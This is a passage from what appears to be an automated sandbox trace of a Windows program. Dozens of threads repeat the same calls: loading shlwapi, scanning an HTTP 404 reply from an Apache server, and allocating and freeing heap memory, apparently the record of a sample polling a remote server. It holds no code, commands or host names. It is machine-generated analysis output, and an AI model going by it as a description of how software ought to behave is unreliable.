dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0285.876] GetProcessHeap () returned 0x6a0000 [0285.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 531 os_tid = 0x9b8 [0286.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.106] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.106] GetProcessHeap () returned 0x6a0000 [0286.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9b8 [0286.106] GetProcessHeap () returned 0x6a0000 [0286.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9b8 | out: hHeap=0x6a0000) returned 1 [0286.106] GetProcessHeap () returned 0x6a0000 [0286.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 532 os_tid = 0xf3c [0286.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.325] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.325] GetProcessHeap () returned 0x6a0000 [0286.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0286.325] GetProcessHeap () returned 0x6a0000 [0286.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0286.326] GetProcessHeap () returned 0x6a0000 [0286.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 533 os_tid = 0x48c [0286.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.555] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.555] GetProcessHeap () returned 0x6a0000 [0286.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0286.555] GetProcessHeap () returned 0x6a0000 [0286.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0286.555] GetProcessHeap () returned 0x6a0000 [0286.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 534 os_tid = 0x810 [0286.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.759] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.759] GetProcessHeap () returned 0x6a0000 [0286.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0286.759] GetProcessHeap () returned 0x6a0000 [0286.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0286.759] GetProcessHeap () returned 0x6a0000 [0286.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 535 os_tid = 0x2cc [0286.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.982] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:13 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0286.982] GetProcessHeap () returned 0x6a0000 [0286.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0286.982] GetProcessHeap () returned 0x6a0000 [0286.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0286.982] GetProcessHeap () returned 0x6a0000 [0286.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 536 os_tid = 0x2a4 [0287.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.227] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.227] GetProcessHeap () returned 0x6a0000 [0287.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea48 [0287.227] GetProcessHeap () returned 0x6a0000 [0287.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea48 | out: hHeap=0x6a0000) returned 1 [0287.227] GetProcessHeap () returned 0x6a0000 [0287.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 537 os_tid = 0x15f4 [0287.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.433] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.433] GetProcessHeap () returned 0x6a0000 [0287.433] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0287.433] GetProcessHeap () returned 0x6a0000 [0287.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0287.433] GetProcessHeap () returned 0x6a0000 [0287.433] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 538 os_tid = 0x15fc [0287.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.644] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.644] GetProcessHeap () returned 0x6a0000 [0287.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0287.644] GetProcessHeap () returned 0x6a0000 [0287.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0287.645] GetProcessHeap () returned 0x6a0000 [0287.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 539 os_tid = 0x888 [0287.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0287.806] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:14 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0287.806] GetProcessHeap () returned 0x6a0000 [0287.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0287.806] GetProcessHeap () returned 0x6a0000 [0287.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0287.807] GetProcessHeap () returned 0x6a0000 [0287.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 540 os_tid = 0xbe4 [0287.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.002] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.002] GetProcessHeap () returned 0x6a0000 [0288.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0288.003] GetProcessHeap () returned 0x6a0000 [0288.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0288.003] GetProcessHeap () returned 0x6a0000 [0288.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 541 os_tid = 0x438 [0288.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.283] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.283] GetProcessHeap () returned 0x6a0000 [0288.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0288.283] GetProcessHeap () returned 0x6a0000 [0288.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0288.283] GetProcessHeap () returned 0x6a0000 [0288.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 542 os_tid = 0x66c [0288.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.490] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.490] GetProcessHeap () returned 0x6a0000 [0288.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0288.490] GetProcessHeap () returned 0x6a0000 [0288.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0288.490] GetProcessHeap () returned 0x6a0000 [0288.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 543 os_tid = 0xfc0 [0288.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0288.773] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:15 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0288.773] GetProcessHeap () returned 0x6a0000 [0288.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0288.773] GetProcessHeap () returned 0x6a0000 [0288.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0288.773] GetProcessHeap () returned 0x6a0000 [0288.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 544 os_tid = 0xd88 [0289.125] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.126] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0289.126] GetProcessHeap () returned 0x6a0000 [0289.126] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0289.126] GetProcessHeap () returned 0x6a0000 [0289.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0289.126] GetProcessHeap () returned 0x6a0000 [0289.127] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 545 os_tid = 0x238 [0289.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.554] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0289.554] GetProcessHeap () returned 0x6a0000 [0289.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0289.554] GetProcessHeap () returned 0x6a0000 [0289.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0289.554] GetProcessHeap () returned 0x6a0000 [0289.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 546 os_tid = 0xa80 [0289.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0289.951] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:16 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0289.951] GetProcessHeap () returned 0x6a0000 [0289.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0289.951] GetProcessHeap () returned 0x6a0000 [0289.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0289.951] GetProcessHeap () returned 0x6a0000 [0289.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 547 os_tid = 0xa28 [0290.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.129] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.129] GetProcessHeap () returned 0x6a0000 [0290.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0290.129] GetProcessHeap () returned 0x6a0000 [0290.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0290.129] GetProcessHeap () returned 0x6a0000 [0290.129] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 548 os_tid = 0xff4 [0290.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.445] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.445] GetProcessHeap () returned 0x6a0000 [0290.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0290.446] GetProcessHeap () returned 0x6a0000 [0290.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0290.446] GetProcessHeap () returned 0x6a0000 [0290.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 549 os_tid = 0x12e4 [0290.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.764] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.764] GetProcessHeap () returned 0x6a0000 [0290.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0290.764] GetProcessHeap () returned 0x6a0000 [0290.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0290.764] GetProcessHeap () returned 0x6a0000 [0290.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 550 os_tid = 0x8c4 [0290.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0290.927] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:17 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0290.927] GetProcessHeap () returned 0x6a0000 [0290.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0290.927] GetProcessHeap () returned 0x6a0000 [0290.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0290.928] GetProcessHeap () returned 0x6a0000 [0290.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 551 os_tid = 0xfbc [0291.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.150] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.150] GetProcessHeap () returned 0x6a0000 [0291.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0291.150] GetProcessHeap () returned 0x6a0000 [0291.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0291.150] GetProcessHeap () returned 0x6a0000 [0291.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 552 os_tid = 0xb80 [0291.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.408] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.408] GetProcessHeap () returned 0x6a0000 [0291.408] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0291.408] GetProcessHeap () returned 0x6a0000 [0291.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0291.408] GetProcessHeap () returned 0x6a0000 [0291.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 553 os_tid = 0x334 [0291.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.661] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.661] GetProcessHeap () returned 0x6a0000 [0291.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0291.662] GetProcessHeap () returned 0x6a0000 [0291.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0291.662] GetProcessHeap () returned 0x6a0000 [0291.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 554 os_tid = 0x142c [0291.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0291.865] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:18 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0291.865] GetProcessHeap () returned 0x6a0000 [0291.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0291.865] GetProcessHeap () returned 0x6a0000 [0291.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0291.865] GetProcessHeap () returned 0x6a0000 [0291.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 555 os_tid = 0x1434 [0292.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.427] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.428] GetProcessHeap () returned 0x6a0000 [0292.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be928 [0292.428] GetProcessHeap () returned 0x6a0000 [0292.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be928 | out: hHeap=0x6a0000) returned 1 [0292.428] GetProcessHeap () returned 0x6a0000 [0292.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 556 os_tid = 0x1430 [0292.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.760] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.761] GetProcessHeap () returned 0x6a0000 [0292.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0292.761] GetProcessHeap () returned 0x6a0000 [0292.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0292.761] GetProcessHeap () returned 0x6a0000 [0292.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 557 os_tid = 0x1808 [0292.992] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0292.992] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:19 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0292.992] GetProcessHeap () returned 0x6a0000 [0292.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0292.992] GetProcessHeap () returned 0x6a0000 [0292.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0292.992] GetProcessHeap () returned 0x6a0000 [0292.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 558 os_tid = 0x180c [0293.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.185] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.185] GetProcessHeap () returned 0x6a0000 [0293.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0293.185] GetProcessHeap () returned 0x6a0000 [0293.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0293.185] GetProcessHeap () returned 0x6a0000 [0293.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 559 os_tid = 0x1810 [0293.374] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.374] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.374] GetProcessHeap () returned 0x6a0000 [0293.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0293.374] GetProcessHeap () returned 0x6a0000 [0293.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0293.374] GetProcessHeap () returned 0x6a0000 [0293.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 560 os_tid = 0x1814 [0293.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0293.583] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:06:20 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0293.583] GetProcessHeap () returned 0x6a0000 [0293.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0293.583] GetProcessHeap () returned 0x6a0000 [0293.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0293.583] GetProcessHeap () returned 0x6a0000 [0293.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: 